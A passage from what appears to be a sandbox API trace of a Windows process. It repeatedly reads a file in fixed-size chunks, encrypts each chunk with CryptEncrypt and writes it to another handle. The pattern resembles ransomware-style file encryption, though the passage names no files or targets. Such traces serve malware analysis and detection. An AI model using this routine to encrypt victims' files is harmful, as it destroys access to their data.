CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.087] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.087] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.087] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.087] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.087] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.088] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.088] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.088] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.088] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.088] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.088] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.088] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.088] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.088] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.088] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.088] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.088] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.088] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.088] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.088] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.088] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.089] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.089] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.089] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.089] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.089] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.089] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.089] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.089] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.089] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.089] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.089] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.089] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.089] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.090] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.090] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.090] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.090] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.090] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.090] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.090] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.090] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.090] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.090] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.090] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.090] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.090] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.090] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.090] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.091] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.091] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.091] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.091] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.091] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.091] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.091] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.091] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.091] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.091] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.091] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.091] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.092] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.092] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.092] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.092] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.092] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.092] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.092] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.092] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.092] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.092] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.092] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.092] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.092] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.092] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.093] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.093] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.093] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.093] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.093] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.093] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.093] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.093] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.093] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.093] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.093] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.093] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.093] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.094] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.094] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.094] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.094] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.094] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.094] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.094] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.094] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0245.094] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.094] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0245.094] CryptEncrypt (in: hKey=0x28e8078, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, 